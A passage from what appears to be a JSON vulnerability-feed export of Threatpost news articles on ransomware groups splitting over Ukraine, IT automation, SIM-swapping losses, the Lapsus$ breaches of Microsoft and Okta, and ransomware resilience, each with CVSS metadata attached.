"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-15T12:58:59", "id": "THREATPOST:31091088EDBCEEF43F75A2BA2387EB5C", "href": "https://threatpost.com/pandora-ransomware-hits-giant-automotive-supplier-denso/178911/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-14T14:53:14", "description": "A rift has formed in the cybercrime underground: one that could strengthen, rather than cripple, the cyber-onslaught of ransomware.\n\nAccording to a report ([PDF](<https://acn-marketing-blog.accenture.com/wp-content/uploads/2022/03/UPDATED-ACTI-Global-Incident-Report-Ideological-Divide-Blog-14MARCH22.pdf>)) published Monday, ever since the outbreak of war in Ukraine, \u201cpreviously coexisting, financially motivated threat actors divided along ideological factions.\u201d\n\n\u201cPro-Ukrainian actors are refusing to sell, buy, or collaborate with Russian-aligned actors, and are increasingly attempting to target Russian entities in support of Ukraine,\u201d wrote researchers from Accenture\u2019s Cyber Threat Intelligence (ACTI). \u201cHowever, pro-Russian actors are increasingly aligning with hacktivist-like activity targeting \u2018enemies of Russia,\u2019 especially Western entities due to their claims of Western warmongering.\u201d\n\n## The Russia-Ukraine Cyber Warzone\n\nHistorically, the world\u2019s foremost cybercrime forums have been Russian language. These dark web marketplaces bring together a complex network of advanced persistent threat (APT) and ransomware groups, botmasters, and malware authors \u2013 a range of cybercriminals that includes even low-level carders, scammers and script kiddies.\n\nTogether, threat actors can [do more](<https://threatpost.com/inside-ransomware-economy/166471/>) than they otherwise could on their own. For example, botmasters offer access to already compromised devices, software developers improve the malware, and initial access brokers specialize in providing network access via backdoors or security vulnerability exploits for things like Remote Desktop Protocol (RDP).\n\nThis productivity is underpinned by not only a shared language, but a shared cultural and political alignment. As ACTI noted in its report, \u201cthese forums previously employed a strict, \u2018no work in CIS\u2019 policy.\u201d The CIS \u2013 Commonwealth of Independent States \u2013 is a post-Soviet conglomeration of Russia and central Asian states.\n\nWith the outbreak of war, however, this harmony is fracturing.\n\nOne poll, published to a cross-site scripting (XSS) forum on March 2, posed the question: \u201cAre you against work on RU and CIS?\u201d 82.6 percent of respondents responded \u201cYes,\u201d but, a surprisingly large minority \u2013 17.4 percent \u2013 responded \u201cNo.\u201d\n\n## No Love For Moscow\n\nOn Feb. 27, an admin from RaidForums \u2013 an online marketplace for trafficking data from high-profile database leaks \u2013 published a statement titled \u201cRAIDFORUMS SANCTIONS ON RUSSIA.\u201d\n\n> ANY USER FOUND TO BE CONNECTING FROM RUSSIA WILL BE BANNED! THIS IS NOT A JOKE, WE DO NOT SUPPORT THE KREMLIN.\n\nShortly after the statement was published, RaidForums\u2019 main server was taken down by unknown enemies. It remained down as of March 4, according to ACTI.\n\nThe same is true in the opposite direction. The conflict \u201chas led some actors to exclusively sell their services, such as network accesses, to pro-Russian actors,\u201d researchers wrote, and inspired increased attacks against Western targets.\n\n## How This Will Hurt the West\n\nIt might appear, at first glance, that civil war in the cyber underground is a good thing. After all, if they\u2019re fighting each other they won\u2019t have time to annoy the rest of us, right?\n\nIn fact, the exact opposite is true.\n\n\u201cThe primary effect of this political divide so far,\u201d the researchers observed, \u201cis an increased and prolonged threat from underground actors aimed at Western targets, owed to the galvanization of pro-Russian actors and their targeted efforts that focus on \u2018enemies of Russia.'\u201d\n\nNationalist fervor is even motivating cybercriminals to open their arms and welcome previously shunned ransomware groups.\n\nIn response to the [Colonial Pipeline](<https://threatpost.com/colonial-pays-5m/166147/>) attack last May, Western governments and law enforcement began cracking down harder than ever on ransomware groups. In response \u2013 to avoid getting the stink on them, too \u2013 underground admins banned those groups.\n\n\u201cWhile ransomware actors did not disappear from the underground,\u201d wrote the researchers, \u201cthe ban did make it harder for them to acquire tools, recruit affiliates, or gain exploits or accesses, thereby reducing ransomware actors\u2019 abilities to scale their operations.\u201d\n\nNow, \u201cmany underground actors call for the return of ransomware groups to the mainstream underground.\u201d\n\nThe consequence of bringing ransomware groups back into the fold \u201cwould not only enable those actors to target Western organizations more efficiently but also embolden them, as other underground actors would likely herald ransomware actors\u2019 return and give those ransomware actors perceived moral reason to conduct attacks,\u201d the report concluded.\n\n## Increasingly Targeting Critical Infrastructure\n\nThe report described an increasing volume of attacks against the West, \u201cespecially in the resources, government, media, financial and insurance industries,\u201d the report said. \u201cThe targeting of financial and insurance entities is due to the perception that they are the working arms of Western financial sanctions, whereas the targeting of utilities and resources entities is due to those organizations\u2019 importance as critical national infrastructure.\u201d\n\nCritical infrastructure will be of particular concern, especially if ransomware groups have the political motive \u2013 plus the tools of the rest of the underground community at their disposal.\n\n\u201cOrganizations within telecommunications, IT, government and critical infrastructure are no doubt on a heightened level of security with the current events in the geopolitical environment,\u201d James McQuiggan of KnowBe4 told Threatpost via email, but \u201ccybersecurity is finally becoming an important topic for the government, considering the number of attacks the various agencies have dealt with over the past number of years.\u201d\n\nIf the cyber onslaught in Ukraine extends West, will the United States and the European Union [be ready](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>)?\n\nThe answer to that question may arrive soon.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-14T13:52:37", "type": "threatpost", "title": "Cybercrooks\u2019 Political In-Fighting Threatens the West", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-14T13:52:37", "id": "THREATPOST:3DB85AFFEA9491ACBD8909D0CF5FBAEA", "href": "https://threatpost.com/cybercrooks-political-in-fighting-threatens-the-west/178899/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-08T16:05:10", "description": "The majority of today\u2019s cybersecurity breaches stem from unpatched vulnerabilities and outdated systems, which means that many cyberattacks are preventable. Unfortunately, it can be challenging for IT teams to keep up with the pace of new patches every month, especially when employee devices are scattered across a distributed workforce and there\u2019s a shortage of cybersecurity professionals. These emerging factors make efficiency a critical component for any IT team.\n\n\n\nTo enable a rapid discovery of new exploits, more companies are turning to IT-automation tools for patching and system management. By streamlining the processes and reducing the workload, IT teams can quickly address new severe exploits and save time to focus their efforts on more high-impact projects.\n\nHowever, while the trend of automation will continue to grow, there still remain many challenges to its adoption, and new innovations or threats could change how the future looks for this technology.\n\n## What Can We Expect in IT Automation in the Near Future?\n\nFirst and foremost, IT automation will adapt to distributed environments. When we surveyed IT professionals, 80 percent stated that the process of managing endpoints has become harder as a result of more employees working remotely. Having to both maintain management servers across multiple, distributed sites and with sporadic, inconsistent connectivity to endpoints has made it difficult for IT teams to remain efficient and nimble. This has led to more organizations looking for cloud-native solutions to remedy these challenges.\n\nCloud-native technologies make connectivity with remote devices easier while staying secure without the use of VPNs. They also improve visibility into the exact, real-time status of a device. IT teams will have an easier time pushing patches automatically without worrying about VPN bandwidth restrictions. Within the next year, anticipate that more businesses will realize these immense benefits and replace existing tools with cloud-native IT automation.\n\nOn the flip side, challenges remain, such as addressing burnout and emerging security concepts.\n\n## IT and Security Teams\u2019 Mental Health Comes to the Fore\n\nOne thing that has become evident in the 2020s is that there is a lack of attention on and investment in employee mental health and safety. This is especially true when it comes to IT and security workers, who have come under enormous pressure and stress in our hybrid world today, where both outages and cyberattacks aren\u2019t just common, but expected to happen at all times.\n\nAutomation is one way to drive more accessibility and ease-of-use for IT teams. While in the past the core argument for automation is to provide more time for innovation, today the argument must simply be, automation creates more time for teams \u2014 but we\u2019re not there yet.\n\nConsider the (relatively) recent issue with the [Log4j vulnerability](<https://threatpost.com/log4j-vulnerability-pressures-security-world/177721/>). The issue wasn\u2019t \u201cjust\u201d that there was a new vulnerability to respond to and worry about. It was that many security and IT professionals had to go through the manual task of updating every endpoint across their system, while managers and even the C-suite watched over their shoulders.\n\nThis isn\u2019t easy \u2013 it\u2019s stressful, and it will make your teams more likely to quit, which is just unacceptable as we continue to navigate a world reshaped by the Great Resignation and IT skills shortage.\n\n## New IT Security Concepts Are on the Horizon\n\nAs Automox predicted at the end of last year, IT and security transformation continue as organizations everywhere try to find a new normal following the disruptions of the pandemic, and IT automation will have to adjust.\n\nThis has been challenging for many organizations \u2014 and more importantly, people, as discussed above \u2014 but there are silver linings too. The pandemic has pushed new innovation across many areas, with exciting new tools and practices on the horizon for IT and security teams.\n\nOne innovation that is particularly interesting is cybersecurity mesh architectures. Gartner has claimed that \u201corganizations adopting a cybersecurity mesh architecture will reduce the financial impact of security incidents by an average of 90 percent\u201d by 2024.\n\nA cybersecurity mesh architecture leverages various parts of the enterprise to integrate widely distributed, disparate security services. This is key to managing and accounting for a workforce that has never been more remote and globally distributed. Designing and implementing an IT security infrastructure that is not focused on a single perimeter, but instead smaller individual perimeters around each access point, provides quality-of-life improvements as well as more control over an organization\u2019s overall security profile.\n\nAnother trend that may seem overdue but is very much happening in real-time is the transition of ITOps and SecOps tools to cloud infrastructure. This includes firewalls, cloud access service brokers (CASBs), web gateways and other tools, as teams wind down legacy on-prem contracts and move to the cloud for more accessibility, speed and scale.\n\nBottom line: IT automation is a transformational trend that is already occurring across the enterprise today, but it needs to accelerate in order to address the many pain points security and IT teams still face today.\n\n**_Chris Hass is the Director of Information Security and Research at [Automox](<https://www.automox.com/>)._**\n\n**_Enjoy additional insights from Threatpost\u2019s Infosec Insiders community by visiting our [microsite](<https://threatpost.com/microsite/infosec-insiders-community/\\]>)._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-08T15:56:36", "type": "threatpost", "title": "The Uncertain Future of IT Automation", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-08T15:56:36", "id": "THREATPOST:3B8B02F621E9D9883A541B1B26BDF410", "href": "https://threatpost.com/uncertain-future-it-automation/178709/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T22:37:59", "description": "SIM-swapping \u2013 the practice of duping mobile carriers into switching a target\u2019s phone services to an attacker-controlled phone \u2013 is on the rise, the Feds are warning \u2013 leading to millions in losses for consumers who found their bank accounts drained and other accounts taken over.\n\nSubscriber Identity Modules (SIMs) are small chips inside mobile phones that allow the carrier to identify and register subscriber devices \u2013 a requirement to provide service to them. Most SIM-swapping attacks take the form of social engineering, where the criminals impersonate victims and convince customer-service agents to change over victims\u2019 services to new phones that they control.\n\nOnce the service has been redirected, the crooks have access to any of the victims\u2019 calls, texts, voicemails and saved profile data, which allows them to send \u201cForgot Password\u201d or \u201cAccount Recovery\u201d requests to the victim\u2019s email, which enables them to easily defeat two-factor authentication that uses one-time passcodes and thus to crack high-value accounts.\n\nWhile SIM-swapping (aka SIM-jacking) isn\u2019t a new practice, the attacks now seem to be accelerating at a rapid clip: Last year, the FBI Internet Crime Complaint Center (IC3) received 1,611 SIM swapping complaints with adjusted losses stemming from resulting account takeovers and data theft totaling more than $68 million, [it said this week](<https://www.ic3.gov/Media/Y2022/PSA220208>). In contrast, for the entire three-year period between January 2018 to December 2020, there were just 320 SIM-swapping complaints, with adjusted losses of approximately $12 million.\n\n## **SIM-Swapping: All Too Easy**\n\nIt\u2019s usually not a difficult plan to execute successfully, given that many carriers [don\u2019t ask in-depth security questions](<https://threatpost.com/social-engineering-telcos-phone-hijacking/144495/>) that fully verify that the caller is in fact the legitimate cell phone user. Often, the challenge questions can be answered with previously phished information or even with public information found on social-media sites.\n\nThe epidemic of large-scale data breaches also contributes to the gambit\u2019s high rate of success, according to Chris Clements, vice president of solutions architecture at Cerberus Sentinel.\n\n\u201cWhen people wonder what the consequences of large-scale data breaches are, this is exactly it,\u201d he noted via email. \u201cBoth people and companies have become conditioned to being able to verify identity through simple questions like Social Security number or mother\u2019s maiden name. Unfortunately, this falls apart completely when data breaches affecting millions of people routinely occur.\u201d\n\nOther attack vectors include phishing and insider-threat avenues. For instance, when it came to light in 2019 that Twitter CEO Jack Dorsey was the victim of a SIM swap, the New York Times [reported](<https://www.nytimes.com/2019/09/05/technology/sim-swap-jack-dorsey-hack.html>) that \u201chacking crews have paid off phone company employees to do\u2026switches for them, often for as little as $100 for each phone number.\u201d Again, this type of accomplice-cultivation isn\u2019t unusual \u2013 it [even resulted in a lawsuit](<https://threatpost.com/att-faces-224m-legal-challenge-over-sim-jacking-rings/136645/>) for AT&amp;T in 2018.\n\nSIM-swapping is not just happening in the United States, either: The Spanish National Police, for instance, this week [busted open](<https://www.policia.es/_es/comunicacion_prensa_detalle.php?ID=11102>) a SIM-swapping ring that got around carriers\u2019 photo-based account verification by using non-original photos of victims to request swaps.\n\n## **Protection Responsibility Lies with Carriers**\n\nThere\u2019s very little that end users can do to avoid becoming victims of SIM-jacking jerks (although the FBI recommends a few protection steps, below). Primarily, it\u2019s the mobile phone company\u2019s responsibility to keep its house in order, researchers said.\n\n\u201cAll organizations, but especially service providers must move from more simplistic means of validating identity to more sophisticated ones,\u201d Cerberus\u2019 Clements said. \u201cPIN codes unique to each user\u2019s account can be one way of adding additional security to the process. \u2018Out of wallet\u2019 questions are another alternative that works by verifying much harder to compromise information such as last three home addresses or cars. It may be more of a hassle for everyone, but it\u2019s simply no longer viable to rely on information that has been routinely compromised to validate a person\u2019s identity.\u201d\n\nAnother best practice that all businesses can implement is to move on from SMS-based 2FA, others said.\n\n\u201cSIM-swapping attacks have been going on for over a decade and have likely resulted in billions in stolen cryptocurrency and other financial crime,\u201d Roger Grimes, data-driven defense evangelist at KnowBe4, said via email. \u201cSMS-based MFA has to be the most popular MFA option used on the internet, and most of the time, people do not have a choice of whether to use it or not. Their bank, vendor or service says they have to use it. And, let me say again, the U.S. government has said not to use it since 2017. The better question to ask is why so many services and vendors are still using SMS-based and phone-number based MFA five years after the U.S. government said not to use it? Why are we so slow and broken?\u201d\n\nThe FBI recommended this week that mobile carriers take the following precautions:\n\n * Educate employees and conduct training sessions on SIM swapping.\n * Carefully inspect incoming email addresses containing official correspondence for slight changes that can make fraudulent addresses appear legitimate and resemble actual clients\u2019 names.\n * Set strict security protocols enabling employees to effectively verify customer credentials before changing their numbers to a new device.\n * Authenticate calls from third-party authorized retailers requesting customer information.\n\n## **SIM-Swapping Consumer Protection Tips**\n\nThe FBI also recommended this week that individuals take the following precautions:\n\n * Do not advertise information about financial assets, including ownership or investment of cryptocurrency, on social-media websites and forums.\n * Do not provide your mobile number account information over the phone to representatives that request your account password or PIN. Verify the call by dialing the customer service line of your mobile carrier.\n * Avoid posting personal information online, such as mobile phone number, address or other personal identifying information.\n * Use a variation of unique passwords to access online accounts.\n * Be aware of any changes in SMS-based connectivity.\n * Use strong MFA methods such as biometrics, physical security tokens or standalone authentication applications to access online accounts.\n * Do not store passwords, usernames or other information for easy login on mobile device applications.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-10T22:13:33", "type": "threatpost", "title": "Sharp SIM-Swapping Spike Causes $68M in Losses", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-10T22:13:33", "id": "THREATPOST:795C39123EE147B39072C9434899E8FE", "href": "https://threatpost.com/sharp-sim-swapping-spike-losses/178358/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-23T15:55:24", "description": "In a new blog post published last night, Microsoft confirmed that the Lapsus$ extortion group hacked one of its employee\u2019s accounts to get \u201climited access\u201d to project source code repositories.\n\n\u201cNo customer code or data was involved in the observed activities. Our investigation has found a single account had been compromised, granting limited access. Our cybersecurity response teams quickly engaged to remediate the compromised account and prevent further activity,\u201d Microsoft explained in an [advisory](<https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/>) about the Lapsus$ threat actors.\n\nOver the weekend and into this week, the gang has publicly [claimed](<https://threatpost.com/lapsus-data-kidnappers-claim-snatches-from-microsoft-okta/179041/>) to have penetrated Microsoft\u2019s defenses and stolen source code, including code for the company\u2019s Bing search engine, Bing Maps and Cortana voice assistant.\n\n## Compromised Azure DevOps Server\n\nOn Sunday, the actor announced that it had compromised Microsoft\u2019s Azure DevOps server. Lapsus$ [shared](<https://twitter.com/ZeroLogon/status/1505408208059383809?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1505408208059383809%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fsecurityaffairs.co%2Fwordpress%2F129344%2Fcyber-crime%2Flapsus-leak-37gb-microsoft-source-code.html>) a screenshot of what were allegedly Microsoft\u2019s internal source code repositories: leaked files that security researchers [said](<https://www.bleepingcomputer.com/news/microsoft/lapsus-hackers-leak-37gb-of-microsofts-alleged-source-code/>) appear to be legitimate internal source code.\n\n> LAPSU$ next victim seem to be [@Microsoft](<https://twitter.com/Microsoft?ref_src=twsrc%5Etfw>) (?)[@SOSIntel](<https://twitter.com/SOSIntel?ref_src=twsrc%5Etfw>) [@LawrenceAbrams](<https://twitter.com/LawrenceAbrams?ref_src=twsrc%5Etfw>) [pic.twitter.com/X5FmgajJcz](<https://t.co/X5FmgajJcz>)\n> \n> \u2014 \ud83e\udd77\ud83c\udffc\ud83d\udcbbTom Malka\ud83d\udcbb\ud83e\udd77\ud83c\udffc (@ZeroLogon) [March 20, 2022](<https://twitter.com/ZeroLogon/status/1505408208059383809?ref_src=twsrc%5Etfw>)\n\nThe threat actor has published more data since then: On Monday night, \u200b\u200bLapsus$ posted a torrent for a 9GB 7zip archive containing the source code of over 250 projects that the gang claimed came from Microsoft. Then, last night, it released 37GB of that Azure DevOps server-derived data, BleepingComputer [reported](<https://www.bleepingcomputer.com/news/microsoft/lapsus-hackers-leak-37gb-of-microsofts-alleged-source-code/>).\n\nSecurity researchers who have pored over the leaked files told BleepingComputer that they appear to be legitimate internal source code from Microsoft; that the leaked projects contain emails and internal engineering documentation for mobile apps; and that the projects look to be for web-based infrastructure, websites, or mobile apps. However, the projects don\u2019t contain source code for Microsoft desktop software such as Windows, Windows Server and Microsoft Office, according to the outlet\u2019s sources.\n\nSecurity Affairs shared a screenshot, shown below, of the uncompressed 7zip archive that contains the 37GB of source code belonging to hundreds of Microsoft projects.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/23104552/Microsoft-data-leak-2-e1648046776282.jpg>)\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/23104557/Microsoft-data-leak-e1648046807438.jpg>)\n\nSource: Security Affairs.\n\nSource code isn\u2019t Medusa. Just looking at it won\u2019t turn anybody into stone. The company \u201cdoes not rely on the secrecy of code as a security measure and viewing source code does not lead to elevation of risk,\u201d Microsoft\u2019s advisory said.\n\n## Lapsus$ TTPs\n\nMicrosoft tracks Lapsus$ as DEV-0537. Its advisory outlines the gang\u2019s tactics, techniques and procedures (TTPs) that it uses to compromise user identities so as to gain initial access to a targeted organization, including:\n\n * Deploying the malicious Redline [password stealer](<https://threatpost.com/various-malware-lurking-in-discord-app-to-target-gamers/163867/>) to obtain passwords and session tokens\n * Purchasing credentials and session tokens from criminal underground forums\n * Paying employees at targeted organizations (or suppliers/business partners) for access to credentials and MFA approval\n * Searching public code repositories for exposed credentials\n\nMicrosoft confirmed that Lapsus$ had used the TTPs in the gang\u2019s attack on Microsoft. \u201cOur team was already investigating the compromised account based on threat intelligence when the actor publicly disclosed their intrusion,\u201d according to its advisory. \u201cThis public disclosure escalated our action allowing our team to intervene and interrupt the actor mid-operation, limiting broader impact.\u201d\n\nWith regards to the third bullet point in that TTP list \u2013 paying rogue employees to help it crack a target\u2019s defenses \u2013 Lapsus$ hasn\u2019t been particularly subtle about its recruitment efforts. The gang [posted](<https://cybersecuritynews.com/beware-lapsus-ransomware-group/>) a notice on its Telegram channel on March 10, telling the world that it was up for recruiting company insiders, including those at Microsoft; other big software/gaming companies such as Apple, IBM or EA; telecoms such as Telefonica, ATT; and more, to help it carry out its dirty work.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/23105813/lapsus-recruitment-ad-e1648047507406.png>)\n\nThe Lapsus$ gang\u2019s recruitment ad for rogue employees. Source: Microsoft.\n\n## How to Stop Lapsus$\n\nMicrosoft\u2019s advisory offered a detailed list of recommendations for organizations to help them avoid going through what it, Okta and a growing list of Lapsus$ victims have suffered.\n\nBelow are some of the company\u2019s top-level suggestions. Its advisory drills down into each:\n\n * Strengthen MFA implementation\n * Require healthy and trusted endpoints\n * Leverage modern authentication options for VPNs\n * Strengthen and monitor your cloud security posture\n * Improve awareness of social engineering attacks\n * Establish operational security processes in response to DEV-0537 intrusions\n\n## Lapsus$ Got at Data for 2.5% of Okta Customers\n\nLapsus$ also breached authentication firm Okta, it claimed: a claim supported by what the actor purported were screenshots of Okta\u2019s Slack channels and the interface for Cloudflare, which is one of thousands of customers that use Okta\u2019s technology to provide authentication for its employees.\n\nIn an [update](<https://www.okta.com/blog/2022/03/updated-okta-statement-on-lapsus/>) published last night, Okta Chief Security Officer David Bradbury confirmed the hit and provided details on the skope, saying that about 2.5 percent of the company\u2019s customers were potentially affected by a January 2022 Lapsus$ intrusion. Hence, those companies\u2019 data \u201cmay have been viewed or acted upon,\u201d he said. As of Tuesday night, Okta had already contacted affected customers by email.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-23T15:28:03", "type": "threatpost", "title": "Microsoft: Lapsus$ Used Employee Account to Steal Source Code", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-23T15:28:03", "id": "THREATPOST:47481707E9A4BF7FC15CC47EC8A8F249", "href": "https://threatpost.com/microsoft-lapsus-compromised-one-employees-account/179048/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-09T22:25:19", "description": "Be forewarned\u2014I\u2019m about to lay down some harsh truths here.\n\nFirst, ransomware is prevalent, and there is no way to completely eliminate the threat.\n\nSecond, at this point, you should operate under the assumption that hackers are already in your systems or could easily access them at any moment. It should come as no surprise when I tell you that the sophisticated cybercriminals behind today\u2019s ransomware threats have been consistently getting past even the best frontline security \u2014 and for a while now.\n\nThird, cybercriminals may know your systems and infrastructure better than you do. Once in, their strategy is to lay low and remain hidden while they learn as much as they can. Then they strike at the optimal time to inflict as much damage as possible to ensure a hefty payday.\n\nSo now what?\n\nThe good news is that there are practices and technologies that can help you detect threats before the bad actors can take action. There are also strategies that you can use to reduce your attack surface while preventing large-scale disruption and disablement once they are inside your environment.\n\nWith that in mind, this two-part series will outline the top six steps you should take right away to ensure resiliency in the face of this ever-present threat. Let\u2019s begin with the first three.\n\n## **Get Full Infrastructure Awareness**\n\nAttackers are looking for your weakest links, and the dark corners where there may be limited security and oversight in your environment. So, it\u2019s vital to implement tools that provide full infrastructure awareness by shining a light on all the dark data in your environment. According to the recently published Veritas Vulnerability Lag research ([PDF here](<https://www.veritas.com/content/dam/Veritas/docs/reports/GA_ENT_AR_Veritas-Vulnerability-Gap-Report-Global_V1414.pdf>)), 35 percent of data is still dark. That is alarmingly high. Get to work on knowing what data you have and where it is ASAP.\n\n**_Important reminder:_** In addition to full visibility of everything in your environment, it is also vital to have clear hard-copy documentation on the details of your environment, like procedures and configurations\u2014including IP addresses, passwords etc.\u2014to help aid with recovery. Missing these details can keep you and your team from being able to quickly recover in the chaos of an attack. Store these in a safe that is checked and updated regularly.\n\n## **Automate Alerts for Anomalous Behavior **\n\nImplement tools that can provide you with detection of anomalous behaviors or activities associated with both data and user activity across your entire environment. It\u2019s important that the detection capabilities can run autonomously, without the need for manual steps.\n\nAlerting your teams to anything anomalous or out of the ordinary will provide you with the upper hand, and a chance to act before the cybercriminals or a malicious code attack. This could be things like unusual file-write activity that could indicate an infiltration, but it could also be detecting known ransomware file extensions, file access patterns, traffic patterns, code downloads, access requests, storage capacity surges, external traffic paths or even an unusual jump in activity compared to individuals\u2019 typical patterns.\n\nFor example, in the infamous [SolarWinds hack](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>), hackers used a regular software update to slip some elegant and innovative malicious code into a multitude of companies\u2019 networks, using the SolarWinds software.\n\nFor more than nine months they roamed around high-profile and sensitive companies, hiding in plain sight while learning their systems and gathering intelligence. Their mistake came when they started roaming around the cybersecurity company FireEye.\n\nThe security team at FireEye noticed suspicious activity \u2014 someone trying to register a second phone onto the company network. Finding it odd that an employee would have two phones, they jumped into action and called the user. Surprise! That user did not register that phone and had no idea who did. Thanks to the vigilance of FireEye, which investigated out-of-the-ordinary activity, the broader intrusions came to light.\n\n_**Important reminder:**_ Conduct cyber-threat hunts regularly. Take it seriously and implement protocols for investigating anomalous behaviors. Hire a third-party agency to audit your strategy, check your work and find vulnerabilities.\n\n## **Limit Access &amp; Reduce Your Attack Surface**\n\nAfter sneaking into your environment, cybercriminals often search for confidential information or login credentials that will allow them to move laterally across your environment. This means that they can also gain access to your backup systems and will attempt to eliminate recovery options.\n\nThere are a few things that you can do to help mitigate this practice:\n\n 1. For starters, 